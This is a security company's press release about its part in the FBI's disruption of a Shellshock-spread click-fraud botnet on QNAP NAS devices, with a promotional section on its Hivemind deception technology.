Forkbombus Labs Assists FBI in Click Fraud Botnet Disruption

On August 4th, 2017, Fabio Gasperini, an Italian citizen, was found guilty by jury trial on one charge of Computer Intrusion for his involvement in the orchestration and propagation of a global botnet used to perform click fraud activity. Forkbombus Labs is proud to announce its pivotal role in the discovery and investigation of the botnet and click fraud activity. “Forkbombus Labs is committed not only to providing immediate defenses, but to working with the global law enforcement community to enable and ensure long term remediation of cyber criminal activity. We take great pride in our role in the disruption and discontinuation of these malicious acts - as well as the identification and apprehension of the suspected parties.” said James Ward, CEO and Co-Founder of Forkbombus Labs.

The Click Fraud Botnet

On December 5th, 2014, Forkbombus Labs was alerted by its Hivemind technology to the existence of a new botnet being propagated by the Shellshock vulnerability (​ CVE-2014-6271 ), specifically targeting QNAP NAS devices which were accessible on the public internet via TCP port 80. Analysis of these attacks revealed the ultimate motivation of perpetrating advertisement click fraud. In addition to the click fraud, the malicious code served several purposes, including but not limited to:

  • Adding a backdoor administrator user account.
  • Creation of a publicly accessible unauthenticated webshell.
  • Configuring an SSH daemon on port 26.
  • Patching the infected QNAP NAS Device for the Shellshock vulnerability, preventing further
  • exploitation.
  • Downloading and execution of a Lightaidra IRC Bot.
  • Further (worm like) Botnet propagation.
  • Visiting advertisements in a fraudulent manner meant to emulate legitimate human activity.

“Our researchers quickly identified long standing related activity and the motivation behind these attacks. This allowed our users to quickly identify the appropriate response for this activity and their needs. Through our combined efforts with the FBI, we were able to engage in root cause remediation of this activity, preventing millions of attacks from affecting our clients and the internet as a whole.” said Stu Gorton, Chief Science Officer and Co-Founder of Forkbombus Labs.

The full report may be found here.

Victim Resources

QNAP NAS Devices which were susceptible to the Shellshock Vulnerability 2 , and accessible via port 80 to the public internet may be infected. ​ Using our Hivemind technology, Forkbombus Labs has identified over 2,500 infected QNAP NAS devices in more than 70 countries. If you suspect you may be a victim of the aforementioned QNAP NAS Botnet, or other cyber criminal activity, please contact Forkbombus Labs at ​ [email protected]​.

Hivemind Intelligent Deception

Hivemind is Forkbombus Labs’ patent pending A.I. Driven Deception Technology. Standard honeypots and deception technologies imitate a predetermined service or environment. This becomes problematic as attackers capabilities and interests often differ than what static deceptions offer. Despite attackers stumbling upon static honeypots, these technologies are often overlooked by attackers who favor different scenarios. When attackers fail to engage with deception technologies, defenders fail to gain valuable intelligence which enables intelligent responses to attacks.

As Hivemind learns an attacker’s capabilities and motivations, Hivemind sensors instantly alter their appearance to each attacker to emulate what they are most likely to interact with. Hivemind ensures attackers are more likely to engage Hivemind sensors, leveraging attackers to divulge unparalleled information about themselves and their intentions as possible. This enhanced collections capabilities enables defenders to rapidly detect attacker’s resources, motivations, and identities, allowing defenders to respond to threats quicker and more intelligently than ever before. Attackers that engage with Hivemind increase their costs while saving defenders time and money.